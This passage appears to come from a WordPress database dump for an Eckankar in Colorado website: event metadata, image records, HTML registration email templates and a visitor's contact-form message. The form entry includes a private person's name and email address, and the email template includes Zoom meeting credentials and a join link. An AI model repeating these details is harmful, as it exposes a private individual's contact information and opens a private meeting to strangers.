965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140343,264797,'_EventShowMapLink',''),(140356,264797,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(140327,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140342,264797,'boldgrid_hide_page_title','0'),(140357,264797,'_RTECregistrationsDisabled','1'),(140328,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140330,264797,'_EventOrigin','events-calendar'),(140331,264797,'_EventOrigin','events-calendar'),(140332,264797,'_EventOrigin','events-calendar'),(140333,264797,'_EventOrigin','events-calendar'),(140334,264797,'_EventOrigin','events-calendar'),(140335,264797,'_EventOrigin','events-calendar'),(140336,264797,'_EventOrigin','events-calendar'),(140337,264797,'_EventOrigin','events-calendar'),(140338,264797,'_EventOrigin','events-calendar'),(140339,264797,'_EventOrigin','events-calendar'),(140340,264797,'_EventOrigin','events-calendar'),(140341,264797,'_thumbnail_id','263189'),(140329,264797,'_EventOrigin','events-calendar'),(140361,264797,'_RTECmaxRegistrations','30'),(140362,264797,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(140363,264797,'_RTECnumRegistered','0'),(140364,264797,'_EventVenueID','262435'),(140366,264797,'_dp_original','264174'),(140367,264797,'_edit_lock','1619922005:2'),(140368,264797,'_edit_last','2'),(150971,265947,'_wp_attached_file','2021/11/podcast-logo-1.png'),(150972,265947,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:397;s:6:\"height\";i:230;s:4:\"file\";s:26:\"2021/11/podcast-logo-1.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"podcast-logo-1-300x174.png\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"podcast-logo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"podcast-logo-1-300x230.png\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"podcast-logo-1-391x230.png\";s:5:\"width\";i:391;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"podcast-logo-1-300x230.png\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143185,265105,'protect_children',''),(143184,265105,'protect_children',''),(143179,265103,'_seq_num','70'),(143178,265103,'_form_id','13'),(143177,265103,'_field_138','Hello! I have had a small collection of “HU Cards” (the very small ones which measure about 2x3, and provide information about singing HU), most likely received over the years with Eckankar book purchases, but I’m now on my last one. I’d like to be able to obtain additional cards as they are perfect to leave in locations for “outreach” - I’m thinking especially of the gym I visit daily. I’d love to leave those little cards in the locker room, and by the magazines. Perhaps I will need to contact the main (MN) office, but thought I would start with the Colorado office as a start, since I live in Boulder. Thank you!'),(143176,265103,'_field_137','“HU cards” (for outreach)'),(143175,265103,'_field_135','rhoann9@gmail.com'),(143174,265103,'_field_134','Miller'),(143200,265105,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-27\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-27\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143199,265105,'mec_end_day_seconds','41400'),(143198,265105,'mec_end_time_ampm','AM'),(143197,265105,'mec_end_time_minutes','30'),(143196,265105,'mec_end_time_hour','11'),(143194,265105,'mec_start_day_seconds','37800'),(143195,265105,'mec_end_date','2021-06-27'),(143193,265105,'mec_start_time_ampm','AM'),(143192,265105,'mec_start_time_minutes','30'),(143191,265105,'mec_start_time_hour','10'),(143189,265105,'mec_organizer_id','1'),(143190,265105,'mec_start_date','2021-06-27'),(143224,265105,'mec_reg_fields','a:0:{}'),(143223,265105,'mec_reg_fields_global_inheritance','1'),(143222,265105,'mec_ticket_variations','a:0:{}'),(143221,265105,'mec_ticket_variations_global_inheritance','1'),(143220,265105,'mec_fees','a:0:{}'),(143219,265105,'mec_fees_global_inheritance','1'),(143218,265105,'mec_tickets','a:0:{}'),(143217,265105,'mec_booking','a:0:{}'),(143216,265105,'mec_hourly_schedules','a:0:{}'),(143215,265105,'mec_not_in_days',''),(143214,265105,'mec_in_days',''),(143211,265105,'mec_repeat_end_at_occurrences',''),(143212,265105,'mec_repeat_end_at_date',''),(143213,265105,'mec_advanced_days','a:0:{}'),(143210,265105,'mec_repeat_end',''),(143209,265105,'mec_repeat_interval','1'),(143208,265105,'mec_repeat_type',''),(143207,265105,'mec_repeat_status','0'),(143249,265106,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:617;s:6:\"height\";i:347;s:4:\"file\";s:26:\"2021/06/father-child-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"father-child-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"father-child-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:26:\"father-child-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:26:\"father-child-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:26:\"father-child-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:26:\"father-child-1-300x347.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"father-child-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143248,265106,'_wp_attached_file','2021/06/father-child-1.jpg'),(143247,265105,'_thumbnail_id','265106'),(143246,265105,'mec_display_cancellation_reason_in_single_page',''),(143245,265105,'mec_cancelled_reason',''),(143244,265105,'mec_moved_online_link',''),(143243,265105,'mec_event_status','EventScheduled'),(143242,265105,'mec_fields','a:0:{}'),(143241,265105,'mec_bfixed_fields','a:0:{}'),(143240,265105,'mec_public','1'),(143239,265105,'mec_countdown_method','global'),(143238,265105,'mec_timezone','global'),(143237,265105,'one_occurrence','0'),(143234,265105,'mec_currency','a:0:{}'),(143235,265105,'mec_additional_organizer_ids','a:0:{}'),(143236,265105,'mec_additional_location_ids','a:0:{}'),(143233,265105,'mec_cost',''),(143232,265105,'mec_more_info_target','_self'),(143228,265105,'_edit_last','2'),(143229,265105,'mec_read_more',''),(143230,265105,'mec_more_info',''),(143231,265105,'mec_more_info_title',''),(143227,265105,'_edit_lock','1622554481:2'),(143226,265105,'mec_event_date_submit','20210422154949'),(143206,265105,'mec_comment',''),(143205,265105,'mec_hide_end_time','0'),(143204,265105,'mec_hide_time','0'),(143188,265105,'mec_dont_show_map','1'),(143187,265105,'mec_location_id','119'),(143186,265105,'mec_color',''),(143173,265103,'_field_133','Rhonda'),(160127,266573,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6154:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9904:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; 